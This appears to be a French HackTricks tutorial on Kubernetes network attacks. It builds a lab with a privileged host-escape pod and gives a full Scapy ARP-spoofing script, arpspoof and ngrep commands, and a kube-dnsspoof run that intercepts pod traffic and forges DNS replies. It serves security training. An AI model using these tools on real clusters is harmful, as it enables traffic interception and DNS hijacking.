Kubernetes Network Attacks

Reading time: 10 minutes

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

Introduction

Dans Kubernetes, il est observĂ© qu'un comportement par dĂ©faut permet l'Ă©tablissement de connexions entre tous les conteneurs rĂ©sidant sur le mĂȘme nƓud. Cela s'applique indĂ©pendamment des distinctions de namespace. Une telle connectivitĂ© s'Ă©tend jusqu'Ă  la couche 2 (Ethernet). Par consĂ©quent, cette configuration expose potentiellement le systĂšme Ă  des vulnĂ©rabilitĂ©s. En particulier, elle ouvre la possibilitĂ© pour un conteneur malveillant d'exĂ©cuter une attaque par spoofing ARP contre d'autres conteneurs situĂ©s sur le mĂȘme nƓud. Lors d'une telle attaque, le conteneur malveillant peut tromper pour intercepter ou modifier le trafic rĂ©seau destinĂ© Ă  d'autres conteneurs.

Les attaques par spoofing ARP impliquent que l'attaquant envoie des messages ARP falsifiĂ©s (Address Resolution Protocol) sur un rĂ©seau local. Cela entraĂźne le lien de l'adresse MAC de l'attaquant avec l'adresse IP d'un ordinateur ou serveur lĂ©gitime sur le rĂ©seau. AprĂšs l'exĂ©cution rĂ©ussie d'une telle attaque, l'attaquant peut intercepter, modifier ou mĂȘme arrĂȘter les donnĂ©es en transit. L'attaque est exĂ©cutĂ©e au niveau de la couche 2 du modĂšle OSI, c'est pourquoi la connectivitĂ© par dĂ©faut dans Kubernetes Ă  ce niveau soulĂšve des prĂ©occupations de sĂ©curitĂ©.

Dans le scĂ©nario, 4 machines vont ĂȘtre créées :

  • ubuntu-pe : Machine privilĂ©giĂ©e pour s'Ă©chapper vers le nƓud et vĂ©rifier les mĂ©triques (non nĂ©cessaire pour l'attaque)
  • ubuntu-attack : Conteneur malveillant dans le namespace par dĂ©faut
  • ubuntu-victim : Machine victime dans le namespace kube-system
  • mysql : Machine victime dans le namespace par dĂ©faut
yaml
echo 'apiVersion: v1
kind: Pod
metadata:
name: ubuntu-pe
spec:
containers:
- image: ubuntu
command:
- "sleep"
- "360000"
imagePullPolicy: IfNotPresent
name: ubuntu-pe
securityContext:
allowPrivilegeEscalation: true
privileged: true
runAsUser: 0
volumeMounts:
- mountPath: /host
name: host-volume
restartPolicy: Never
hostIPC: true
hostNetwork: true
hostPID: true
volumes:
- name: host-volume
hostPath:
path: /
---
apiVersion: v1
kind: Pod
metadata:
name: ubuntu-attack
labels:
app: ubuntu
spec:
containers:
- image: ubuntu
command:
- "sleep"
- "360000"
imagePullPolicy: IfNotPresent
name: ubuntu-attack
restartPolicy: Never
---
apiVersion: v1
kind: Pod
metadata:
name: ubuntu-victim
namespace: kube-system
spec:
containers:
- image: ubuntu
command:
- "sleep"
- "360000"
imagePullPolicy: IfNotPresent
name: ubuntu-victim
restartPolicy: Never
---
apiVersion: v1
kind: Pod
metadata:
name: mysql
spec:
containers:
- image: mysql:5.6
ports:
- containerPort: 3306
imagePullPolicy: IfNotPresent
name: mysql
env:
- name: MYSQL_ROOT_PASSWORD
value: mysql
restartPolicy: Never' | kubectl apply -f -
bash
kubectl exec -it ubuntu-attack -- bash -c "apt update; apt install -y net-tools python3-pip python3 ngrep nano dnsutils; pip3 install scapy; bash"
kubectl exec -it ubuntu-victim -n kube-system -- bash -c "apt update; apt install -y net-tools curl netcat mysql-client; bash"
kubectl exec -it mysql bash -- bash -c "apt update; apt install -y net-tools; bash"

Réseau Kubernetes de base

Si vous souhaitez plus de détails sur les sujets de réseau introduits ici, consultez les références.

ARP

De maniĂšre gĂ©nĂ©rale, le rĂ©seau pod-Ă -pod Ă  l'intĂ©rieur du nƓud est disponible via un pont qui connecte tous les pods. Ce pont s'appelle “cbr0”. (Certains plugins rĂ©seau installeront leur propre pont.) Le cbr0 peut Ă©galement gĂ©rer la rĂ©solution ARP (Address Resolution Protocol). Lorsqu'un paquet entrant arrive Ă  cbr0, il peut rĂ©soudre l'adresse MAC de destination en utilisant ARP.

Ce fait implique que, par dĂ©faut, chaque pod s'exĂ©cutant dans le mĂȘme nƓud sera capable de communiquer avec tout autre pod dans le mĂȘme nƓud (indĂ©pendamment de l'espace de noms) au niveau ethernet (couche 2).

warning

Par consĂ©quent, il est possible d'effectuer des attaques de spoofing ARP entre les pods dans le mĂȘme nƓud.

DNS

Dans les environnements kubernetes, vous trouverez généralement 1 (ou plusieurs) services DNS en cours d'exécution, généralement dans l'espace de noms kube-system :

bash
kubectl -n kube-system describe services
Name:              kube-dns
Namespace:         kube-system
Labels:            k8s-app=kube-dns
kubernetes.io/cluster-service=true
kubernetes.io/name=KubeDNS
Annotations:       prometheus.io/port: 9153
prometheus.io/scrape: true
Selector:          k8s-app=kube-dns
Type:              ClusterIP
IP Families:       <none>
IP:                10.96.0.10
IPs:               10.96.0.10
Port:              dns  53/UDP
TargetPort:        53/UDP
Endpoints:         172.17.0.2:53
Port:              dns-tcp  53/TCP
TargetPort:        53/TCP
Endpoints:         172.17.0.2:53
Port:              metrics  9153/TCP
TargetPort:        9153/TCP
Endpoints:         172.17.0.2:9153

Dans les informations précédentes, vous pouvez voir quelque chose d'intéressant, l'IP du service est 10.96.0.10 mais l'IP du pod exécutant le service est 172.17.0.2.

Si vous vérifiez l'adresse DNS à l'intérieur de n'importe quel pod, vous trouverez quelque chose comme ceci :

cat /etc/resolv.conf
nameserver 10.96.0.10

Cependant, le pod ne sait pas comment accéder à cette adresse car la plage de pods dans ce cas est 172.17.0.10/26.

Par consĂ©quent, le pod enverra les requĂȘtes DNS Ă  l'adresse 10.96.0.10 qui sera traduit par le cbr0 en 172.17.0.2.

warning

Cela signifie qu'une requĂȘte DNS d'un pod va toujours passer par le pont pour traduire l'IP du service en IP de l'endpoint, mĂȘme si le serveur DNS est dans le mĂȘme sous-rĂ©seau que le pod.

Sachant cela, et sachant que des attaques ARP sont possibles, un pod dans un nƓud sera capable de intercepter le trafic entre chaque pod dans le sous-rĂ©seau et le pont et modifier les rĂ©ponses DNS du serveur DNS (DNS Spoofing).

De plus, si le serveur DNS est dans le mĂȘme nƓud que l'attaquant, l'attaquant peut intercepter toutes les requĂȘtes DNS de n'importe quel pod dans le cluster (entre le serveur DNS et le pont) et modifier les rĂ©ponses.

Spoofing ARP dans les pods dans le mĂȘme NƓud

Notre objectif est de voler au moins la communication de l'ubuntu-victim au mysql.

Scapy

bash
python3 /tmp/arp_spoof.py
Enter Target IP:172.17.0.10 #ubuntu-victim
Enter Gateway IP:172.17.0.9 #mysql
Target MAC 02:42:ac:11:00:0a
Gateway MAC: 02:42:ac:11:00:09
Sending spoofed ARP responses

# Get another shell
kubectl exec -it ubuntu-attack -- bash
ngrep -d eth0

# Login from ubuntu-victim and mysql and check the unencrypted communication
# interacting with the mysql instance
arp_spoof.py
#From https://gist.github.com/rbn15/bc054f9a84489dbdfc35d333e3d63c87#file-arpspoofer-py
from scapy.all import *

def getmac(targetip):
arppacket= Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=targetip)
targetmac= srp(arppacket, timeout=2 , verbose= False)[0][0][1].hwsrc
return targetmac

def spoofarpcache(targetip, targetmac, sourceip):
spoofed= ARP(op=2 , pdst=targetip, psrc=sourceip, hwdst= targetmac)
send(spoofed, verbose= False)

def restorearp(targetip, targetmac, sourceip, sourcemac):
packet= ARP(op=2 , hwsrc=sourcemac , psrc= sourceip, hwdst= targetmac , pdst= targetip)
send(packet, verbose=False)
print("ARP Table restored to normal for", targetip)

def main():
targetip= input("Enter Target IP:")
gatewayip= input("Enter Gateway IP:")

try:
targetmac= getmac(targetip)
print("Target MAC", targetmac)
except:
print("Target machine did not respond to ARP broadcast")
quit()

try:
gatewaymac= getmac(gatewayip)
print("Gateway MAC:", gatewaymac)
except:
print("Gateway is unreachable")
quit()
try:
print("Sending spoofed ARP responses")
while True:
spoofarpcache(targetip, targetmac, gatewayip)
spoofarpcache(gatewayip, gatewaymac, targetip)
except KeyboardInterrupt:
print("ARP spoofing stopped")
restorearp(gatewayip, gatewaymac, targetip, targetmac)
restorearp(targetip, targetmac, gatewayip, gatewaymac)
quit()

if __name__=="__main__":
main()

# To enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward

ARPSpoof

bash
apt install dsniff
arpspoof -t 172.17.0.9 172.17.0.10

DNS Spoofing

Comme dĂ©jĂ  mentionnĂ©, si vous compromettez un pod dans le mĂȘme nƓud que le pod serveur DNS, vous pouvez MitM avec ARPSpoofing le pont et le pod DNS et modifier toutes les rĂ©ponses DNS.

Vous avez un trĂšs bon outil et tutoriel pour tester cela dans https://github.com/danielsagi/kube-dnsspoof/

Dans notre scénario, téléchargez l'outil dans le pod attaquant et créez un fichier nommé hosts avec les domaines que vous souhaitez spoof comme :

cat hosts
google.com. 1.1.1.1

Effectuez l'attaque sur la machine ubuntu-victim :

python3 exploit.py --direct 172.17.0.10
[*] starting attack on direct mode to pod 172.17.0.10
Bridge:  172.17.0.1 02:42:bd:63:07:8d
Kube-dns:  172.17.0.2 02:42:ac:11:00:02

[+] Taking over DNS requests from kube-dns. press Ctrl+C to stop
bash
#In the ubuntu machine
dig google.com
[...]
;; ANSWER SECTION:
google.com.		1	IN	A	1.1.1.1

note

Si vous essayez de créer votre propre script de spoofing DNS, si vous modifiez simplement la réponse DNS cela ne va pas fonctionner, car la réponse aura une src IP l'adresse IP du pod malveillant et ne sera pas acceptée.
Vous devez gĂ©nĂ©rer un nouveau paquet DNS avec la src IP du DNS oĂč la victime envoie la requĂȘte DNS (ce qui est quelque chose comme 172.16.0.2, pas 10.96.0.10, c'est l'IP du service DNS K8s et non l'IP du serveur DNS, plus Ă  ce sujet dans l'introduction).

DNS Spoofing via coreDNS configmap

Un utilisateur ayant des permissions d'écriture sur le configmap coredns dans l'espace de noms kube-system peut modifier les réponses DNS du cluster.

Vérifiez plus d'informations sur cette attaque dans :

{{#ref}} abusing-roles-clusterroles-in-kubernetes/README.md {{/ref}}

Abusing exposed kubernetes management services

Des services comme Apache NiFi, Kubeflow, Argo Workflows, Weave Scope et le tableau de bord Kubernetes sont souvent exposĂ©s soit Ă  Internet, soit au sein du rĂ©seau Kubernetes. Un attaquant qui parvient Ă  trouver une plateforme utilisĂ©e pour gĂ©rer Kubernetes et y accĂ©der peut en abuser pour obtenir l'accĂšs Ă  l'API Kubernetes et effectuer des actions telles que crĂ©er de nouveaux pods, modifier des pods existants ou mĂȘme les supprimer.

Enumerating kubernetes network policies

Obtenez les networkpolicies configurées :

bash
kubectl get networkpolicies --all-namespaces

Obtenir les politiques réseau Callico :

bash
kubectl get globalnetworkpolicy --all-namespaces

Obtenez les politiques réseau Cillium :

bash
kubectl get ciliumnetworkpolicy --all-namespaces

Obtenez d'autres CRD liés aux politiques installés par votre plugin réseau ou solution de sécurité :

bash
kubectl get crd | grep -i policy

Capturer le trafic

L'outil Mizu est un visualiseur de trafic API pour Kubernetes simple mais puissant, vous permettant de voir toute la communication API entre les microservices pour vous aider à déboguer et à résoudre les régressions.
Il installera des agents dans les pods sélectionnés et rassemblera leurs informations de trafic pour vous les afficher sur un serveur web. Cependant, vous aurez besoin de permissions K8s élevées pour cela (et ce n'est pas trÚs discret).

Références

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks